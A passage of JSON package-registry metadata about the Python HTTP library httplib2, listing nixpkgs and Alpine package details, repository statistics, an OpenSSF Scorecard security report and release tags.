rl":"pkg:nix/python314Packages.httplib2?channel=unstable","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python314Packages.httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python314Packages.httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python314Packages.httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python314Packages.httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python314Packages.httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python314Packages.httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python314Packages.httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python314Packages.httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python314Packages.httplib2/codemeta","maintainers":[{"uuid":"fabaff","login":null,"name":"Fabian Affolter","email":"mail@fabian-affolter.ch","url":"https://github.com/fabaff","packages_count":5672,"html_url":null,"role":null,"created_at":"2026-03-08T04:38:59.017Z","updated_at":"2026-03-08T04:38:59.017Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/maintainers/fabaff/packages"}],"registry":{"name":"nixpkgs-unstable","url":"https://channels.nixos.org/nixos-unstable","ecosystem":"nixpkgs","default":true,"packages_count":153806,"maintainers_count":4905,"namespaces_count":0,"keywords_count":3244,"github":"NixOS","metadata":{"funded_packages_count":6032},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:52.762Z","updated_at":"2026-08-25T05:00:24.061Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/namespaces"}},{"id":6134485,"name":"py3-httplib2","ecosystem":"alpine","description":"A Python HTTP client library (for python3)","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2017-04-21T07:55:41.000Z","latest_release_published_at":"2017-04-21T07:55:41.000Z","latest_release_number":"0.10.3-r0","last_synced_at":"2026-03-10T13:08:34.085Z","created_at":"2023-01-31T22:18:39.258Z","updated_at":"2026-08-21T14:22:36.190Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.6/main/x86_64/py3-httplib2","install_command":"apk add py3-httplib2","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/